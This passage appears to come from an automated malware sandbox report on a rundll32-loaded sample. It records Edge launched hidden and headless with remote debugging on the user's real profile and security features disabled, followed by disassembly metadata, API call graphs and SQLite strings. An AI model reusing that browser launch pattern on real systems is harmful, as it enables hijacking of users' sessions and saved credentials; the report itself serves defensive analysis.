                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9949 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:26
                                                                                                                                                      Start time:07:25:11
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1532 --field-trial-handle=1520,i,669827839164534897,9964202643193972366,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:28
                                                                                                                                                      Start time:07:25:43
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9470 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:29
                                                                                                                                                      Start time:07:25:44
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1608 --field-trial-handle=1484,i,2587286534842799086,6337891116832541392,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:30
                                                                                                                                                      Start time:07:26:08
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9459 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:31
                                                                                                                                                      Start time:07:26:09
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1624 --field-trial-handle=1556,i,748892074680113926,7417843126809738630,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:32
                                                                                                                                                      Start time:07:27:20
                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9909 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:false

                                                                                                                                                      Reset < >
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.2176000555.00007FFDF9BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFDF9BF0000, based on PE: true
                                                                                                                                                        • Associated: 0000000A.00000002.2175985315.00007FFDF9BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 0000000A.00000002.2176549929.00007FFDFB405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 0000000A.00000002.2176549929.00007FFDFB42E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 0000000A.00000002.2177427500.00007FFDFB7BB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 0000000A.00000002.2177445935.00007FFDFB7C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 0000000A.00000002.2177467742.00007FFDFB7FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 0000000A.00000002.2177483311.00007FFDFB7FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ffdf9bf0000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                        • Opcode ID: 07f44f13d228468b3a7c5f48714941a365ecf3302e810ad5fd32ac12285b8e82
                                                                                                                                                        • Instruction ID: bca9da7d52d67133f82ab0f4286cc6ae0f4a1a32645885d0ac7067c3e69f8494
                                                                                                                                                        • Opcode Fuzzy Hash: 07f44f13d228468b3a7c5f48714941a365ecf3302e810ad5fd32ac12285b8e82
                                                                                                                                                        • Instruction Fuzzy Hash: BA111826B25F068AEB00CF60E8646B833A4FB59758F440E35EE6D877A8EF78D1548340

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:1%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                        Signature Coverage:15.9%
                                                                                                                                                        Total number of Nodes:208
                                                                                                                                                        Total number of Limit Nodes:46
                                                                                                                                                        execution_graph 106841 7ffdff166570 106844 7ffdff241b00 106841->106844 106843 7ffdff166597 106845 7ffdff241b2b _raise_excf 106844->106845 106846 7ffdff241b7e _raise_excf 106844->106846 106845->106843 106846->106845 106848 7ffdff24baa0 106846->106848 106851 7ffdff24bb0f new[] _raise_excf 106848->106851 106849 7ffdff24bdc1 106859 7ffdff250440 106849->106859 106851->106849 106852 7ffdff24bcae _raise_excf 106851->106852 106854 7ffdff24bb89 _raise_excf 106851->106854 106853 7ffdff24bd45 _raise_excf 106852->106853 106852->106854 106856 7ffdff250440 _raise_excf GetSystemInfo 106852->106856 106853->106854 106855 7ffdff24be54 106853->106855 106863 7ffdff2022f0 19 API calls _raise_excf 106853->106863 106854->106846 106855->106854 106864 7ffdff26cc90 23 API calls _raise_excf 106855->106864 106856->106853 106861 7ffdff250490 _raise_excf 106859->106861 106862 7ffdff2507e1 _raise_excf 106861->106862 106865 7ffdff245f60 106861->106865 106862->106853 106863->106855 106864->106854 106867 7ffdff245fa1 _raise_excf 106865->106867 106866 7ffdff24608e 106870 7ffdff2460ad _raise_excf 106866->106870 106872 7ffdff297490 GetSystemInfo new[] _raise_excf 106866->106872 106867->106866 106867->106870 106871 7ffdff297490 GetSystemInfo new[] _raise_excf 106867->106871 106870->106861 106871->106867 106872->106870 106873 7ffdff165430 106878 7ffdff27b8a0 106873->106878 106875 7ffdff16544c new[] _raise_excf 106876 7ffdff1654f9 _raise_excf 106875->106876 106889 7ffdff1ef5d0 106875->106889 106879 7ffdff27b8ad 106878->106879 106880 7ffdff27b8b5 new[] _raise_excf 106878->106880 106879->106875 106881 7ffdff27b8a0 _raise_excf GetSystemInfo 106880->106881 106888 7ffdff27bc14 106880->106888 106882 7ffdff27bb0c new[] _raise_excf 106881->106882 106882->106888 106900 7ffdff27be70 GetSystemInfo 106882->106900 106884 7ffdff27bb32 106885 7ffdff27b8a0 _raise_excf GetSystemInfo 106884->106885 106884->106888 106887 7ffdff27bb41 106885->106887 106886 7ffdff27b8a0 _raise_excf GetSystemInfo 106886->106888 106887->106886 106887->106888 106888->106875 106890 7ffdff27b8a0 _raise_excf GetSystemInfo 106889->106890 106892 7ffdff1ef607 new[] 106890->106892 106894 7ffdff1ef892 106892->106894 106896 7ffdff1ef9da _raise_excf 106892->106896 106899 7ffdff1ef6a6 _raise_excf 106892->106899 106910 7ffdff2457f0 GetSystemInfo new[] _raise_excf 106892->106910 106894->106899 106902 7ffdff20df40 106894->106902 106896->106876 106897 7ffdff1efa40 _raise_excf 106897->106899 106911 7ffdff173030 GetSystemInfo _raise_excf 106897->106911 106899->106896 106912 7ffdff2100e0 19 API calls _raise_excf 106899->106912 106901 7ffdff27beaa _raise_excf 106900->106901 106901->106884 106906 7ffdff20df8f new[] _raise_excf 106902->106906 106904 7ffdff20e2ea _raise_excf 106908 7ffdff20e374 _raise_excf 106904->106908 106917 7ffdff1536f0 106904->106917 106907 7ffdff20e0a5 _raise_excf 106906->106907 106906->106908 106913 7ffdff2440d0 106906->106913 106907->106897 106908->106907 106923 7ffdff2438b0 19 API calls _raise_excf 106908->106923 106910->106894 106911->106899 106912->106896 106914 7ffdff24415e new[] _raise_excf 106913->106914 106915 7ffdff2443d6 _raise_excf 106914->106915 106924 7ffdff154510 106914->106924 106915->106904 106919 7ffdff15371d _raise_excf 106917->106919 106918 7ffdff1537a0 ReadFile 106918->106919 106920 7ffdff153734 new[] _raise_excf 106918->106920 106919->106918 106919->106920 106921 7ffdff153830 106919->106921 106920->106908 106935 7ffdff291a30 8 API calls _raise_excf 106921->106935 106923->106907 106928 7ffdff154561 _raise_excf 106924->106928 106926 7ffdff1547c0 CreateFileW 106926->106928 106928->106926 106929 7ffdff154a72 106928->106929 106931 7ffdff1549d1 _raise_excf 106928->106931 106932 7ffdff291210 9 API calls 2 library calls 106928->106932 106933 7ffdff157490 8 API calls _raise_excf 106928->106933 106934 7ffdff291a30 8 API calls _raise_excf 106929->106934 106931->106915 106932->106928 106933->106928 106934->106931 106935->106920 106936 7ffdff255d90 106937 7ffdff255db6 106936->106937 106938 7ffdff255e8e 106936->106938 106937->106938 106939 7ffdff255df7 106937->106939 106940 7ffdff26fa20 23 API calls 106937->106940 106946 7ffdff26fa20 106939->106946 106940->106939 106943 7ffdff26fa20 23 API calls 106944 7ffdff255e5a 106943->106944 106944->106938 106945 7ffdff26fa20 23 API calls 106944->106945 106945->106938 106947 7ffdff255e21 106946->106947 106951 7ffdff26fa37 106946->106951 106947->106938 106947->106943 106948 7ffdff26f940 23 API calls 106948->106951 106950 7ffdff26fa20 23 API calls 106950->106951 106951->106947 106951->106948 106951->106950 106953 7ffdff202570 106951->106953 106962 7ffdff28a3f0 23 API calls 106951->106962 106957 7ffdff2025c5 new[] _raise_excf 106953->106957 106961 7ffdff2025c9 _raise_excf 106953->106961 106954 7ffdff26fa20 23 API calls 106954->106957 106957->106954 106957->106961 106963 7ffdff1fcd40 106957->106963 106976 7ffdff2418e0 106957->106976 106980 7ffdff2124b0 GetSystemInfo new[] _raise_excf 106957->106980 106981 7ffdff285f40 23 API calls _raise_excf 106957->106981 106982 7ffdff2563d0 23 API calls _raise_excf 106957->106982 106961->106951 106962->106951 106965 7ffdff1fcd79 new[] _raise_excf 106963->106965 106966 7ffdff1fce1f _raise_excf 106963->106966 106965->106966 106983 7ffdff2563d0 23 API calls _raise_excf 106965->106983 106966->106957 106967 7ffdff1fd124 106969 7ffdff26fa20 23 API calls 106967->106969 106968 7ffdff1fd2e0 106970 7ffdff26fa20 23 API calls 106968->106970 106971 7ffdff1fd13c 106969->106971 106970->106971 106971->106966 106984 7ffdff2124b0 GetSystemInfo new[] _raise_excf 106971->106984 106973 7ffdff1fd320 106973->106966 106975 7ffdff26fa20 23 API calls 106973->106975 106974 7ffdff1fd08b 106974->106966 106974->106967 106974->106968 106975->106966 106977 7ffdff24190c 106976->106977 106979 7ffdff241911 _raise_excf 106976->106979 106985 7ffdff24d630 106977->106985 106979->106957 106980->106957 106981->106957 106982->106957 106983->106974 106984->106973 106986 7ffdff24d655 106985->106986 106987 7ffdff24d649 106985->106987 106986->106979 106989 7ffdff23da40 106987->106989 106990 7ffdff23da7c 106989->106990 106993 7ffdff23da89 106989->106993 106995 7ffdff23de10 106990->106995 106992 7ffdff23dadd 106992->106986 106993->106992 106994 7ffdff23de10 _raise_excf 23 API calls 106993->106994 106994->106993 107006 7ffdff23db10 106995->107006 106997 7ffdff23dec4 _raise_excf 106999 7ffdff23deeb _raise_excf 106997->106999 107001 7ffdff23df39 _raise_excf 106997->107001 107015 7ffdff182010 106997->107015 106999->106993 107000 7ffdff23dfe9 _raise_excf 107000->106999 107035 7ffdff20c1d0 19 API calls _raise_excf 107000->107035 107001->106999 107001->107000 107024 7ffdff162f50 107001->107024 107004 7ffdff23e271 _raise_excf 107004->107000 107034 7ffdff2090d0 23 API calls _raise_excf 107004->107034 107007 7ffdff23db32 _raise_excf 107006->107007 107011 7ffdff23db3b _raise_excf 107006->107011 107008 7ffdff24baa0 _raise_excf 23 API calls 107007->107008 107007->107011 107009 7ffdff23dc20 _raise_excf 107008->107009 107009->107011 107036 7ffdff26cc90 23 API calls _raise_excf 107009->107036 107011->106997 107012 7ffdff23dd0f _raise_excf 107037 7ffdff240790 19 API calls _raise_excf 107012->107037 107014 7ffdff23dd35 107014->106997 107017 7ffdff18204b _raise_excf 107015->107017 107016 7ffdff1820a6 _raise_excf 107016->107001 107017->107016 107022 7ffdff182262 107017->107022 107038 7ffdff1e96b0 107017->107038 107047 7ffdff1f1310 17 API calls _raise_excf 107017->107047 107048 7ffdff243700 RaiseException _raise_excf 107017->107048 107049 7ffdff1ee860 GetSystemInfo _raise_excf 107017->107049 107022->107016 107050 7ffdff1f1530 GetSystemInfo _raise_excf 107022->107050 107031 7ffdff162f77 new[] _raise_excf 107024->107031 107032 7ffdff162f80 _raise_excf 107024->107032 107025 7ffdff241b00 _raise_excf 23 API calls 107025->107032 107026 7ffdff1634a1 _raise_excf 107026->107031 107099 7ffdff26cc90 23 API calls _raise_excf 107026->107099 107030 7ffdff1634b8 107030->107031 107098 7ffdff26cc90 23 API calls _raise_excf 107030->107098 107031->107004 107032->107025 107032->107026 107032->107030 107032->107031 107088 7ffdff169dd0 107032->107088 107097 7ffdff26cc90 23 API calls _raise_excf 107032->107097 107034->107000 107035->106999 107036->107012 107037->107014 107051 7ffdff244fe0 107038->107051 107040 7ffdff1e96c1 107045 7ffdff1e97f2 _raise_excf 107040->107045 107059 7ffdff1de4b0 107040->107059 107041 7ffdff1e97e1 _raise_excf 107041->107045 107069 7ffdff1f1310 17 API calls _raise_excf 107041->107069 107043 7ffdff1e96e8 107043->107041 107043->107045 107065 7ffdff244980 107043->107065 107045->107017 107047->107017 107048->107017 107049->107017 107050->107016 107052 7ffdff2452c0 _raise_excf 107051->107052 107058 7ffdff245010 _raise_excf 107051->107058 107057 7ffdff2450af _raise_excf 107052->107057 107070 7ffdff26ed30 107052->107070 107054 7ffdff2451b4 _raise_excf 107054->107052 107056 7ffdff244980 _raise_excf 10 API calls 107054->107056 107054->107057 107056->107052 107057->107040 107058->107052 107058->107054 107058->107057 107076 7ffdff1f1ee0 GetSystemInfo _raise_excf 107058->107076 107061 7ffdff1de505 _raise_excf 107059->107061 107064 7ffdff1de4d2 new[] _raise_excf 107059->107064 107063 7ffdff1de5f6 _raise_excf 107061->107063 107061->107064 107077 7ffdff1f8340 107061->107077 107063->107064 107083 7ffdff1f1310 17 API calls _raise_excf 107063->107083 107064->107043 107066 7ffdff244995 107065->107066 107068 7ffdff2449e5 107065->107068 107066->107068 107084 7ffdff1f0b50 107066->107084 107068->107041 107069->107045 107072 7ffdff26ed6d _raise_excf 107070->107072 107071 7ffdff289c70 _raise_excf 17 API calls 107071->107072 107072->107071 107073 7ffdff26ee01 _raise_excf 107072->107073 107074 7ffdff26edd0 _raise_excf 107072->107074 107073->107074 107075 7ffdff202470 _raise_excf RaiseException 107073->107075 107074->107057 107075->107074 107076->107054 107078 7ffdff1f836a 107077->107078 107079 7ffdff1f8377 107077->107079 107080 7ffdff26f510 _raise_excf 16 API calls 107078->107080 107081 7ffdff1f8387 107079->107081 107082 7ffdff1536f0 9 API calls 107079->107082 107080->107079 107081->107063 107082->107081 107083->107064 107085 7ffdff1f0b60 new[] _raise_excf 107084->107085 107086 7ffdff1f0c41 _raise_excf 107085->107086 107087 7ffdff154510 10 API calls 107085->107087 107086->107068 107087->107086 107089 7ffdff169df0 107088->107089 107090 7ffdff169de7 _raise_excf 107088->107090 107089->107090 107100 7ffdff257db0 107089->107100 107090->107032 107093 7ffdff169e69 107095 7ffdff257db0 _raise_excf 23 API calls 107093->107095 107096 7ffdff169ec1 _raise_excf 107093->107096 107104 7ffdff24e5c0 23 API calls _raise_excf 107093->107104 107105 7ffdff16b090 23 API calls _raise_excf 107093->107105 107095->107093 107096->107032 107097->107032 107098->107031 107099->107031 107102 7ffdff257dcd 107100->107102 107103 7ffdff257dec _raise_excf 107100->107103 107102->107103 107106 7ffdff16b090 23 API calls _raise_excf 107102->107106 107103->107093 107104->107093 107105->107093 107106->107102 107107 7ffdff1eba40 107110 7ffdff1eba70 _raise_excf 107107->107110 107109 7ffdff1ebbbc _raise_excf 107110->107109 107111 7ffdff1dcc00 107110->107111 107112 7ffdff1dcc64 107111->107112 107113 7ffdff1dcc1d _raise_excf 107111->107113 107115 7ffdff1de4b0 17 API calls 107112->107115 107113->107110 107114 7ffdff1dcc79 _raise_excf 107114->107110 107115->107114
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$:memory:$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$invalid$main$misuse$temp$v
                                                                                                                                                        • API String ID: 0-534082081
                                                                                                                                                        • Opcode ID: 5de25b49e6e17115ad08f29cb73ba260f3ae3fa630ec86ba601fb3cb41945f2b
                                                                                                                                                        • Instruction ID: 22554faddee2c7ac1cc6d6c481221549838e193af09dfb723e4765f053abddc1
                                                                                                                                                        • Opcode Fuzzy Hash: 5de25b49e6e17115ad08f29cb73ba260f3ae3fa630ec86ba601fb3cb41945f2b
                                                                                                                                                        • Instruction Fuzzy Hash: 6A425A26F08B4285EB649F25A860A7927A1FB44B88F544235DEBD873EDDF3CE545C340
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %!S$%s.%s$%s.%s.%s$'%s' is not a function$..%s$Expression tree is too large (maximum depth %d)$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                        • API String ID: 0-3486433936
                                                                                                                                                        • Opcode ID: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                        • Instruction ID: 82b51d0359732db3e0326801b8b98ae768b8dc6f68834de3a1a6bec19d025e5d
                                                                                                                                                        • Opcode Fuzzy Hash: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                        • Instruction Fuzzy Hash: B3D2AF33B09B8286EB618B1591A0BB977A0FB45B94F084336DA7DD77D9DF78E8508700
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                        • API String ID: 823142352-3829269058
                                                                                                                                                        • Opcode ID: 02c7020dbeffaddb209c397736d977bd09e424f1cef45ca7c9e20fd774730bbf
                                                                                                                                                        • Instruction ID: cb6c95a8299f02e673315d6049a133b14b9e7204cce21580e0aea2955dada477
                                                                                                                                                        • Opcode Fuzzy Hash: 02c7020dbeffaddb209c397736d977bd09e424f1cef45ca7c9e20fd774730bbf
                                                                                                                                                        • Instruction Fuzzy Hash: F4329222F0968686FB548F15A8B0B7967A0FF44BA4F194335DA7E876E8DF3CE4508700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
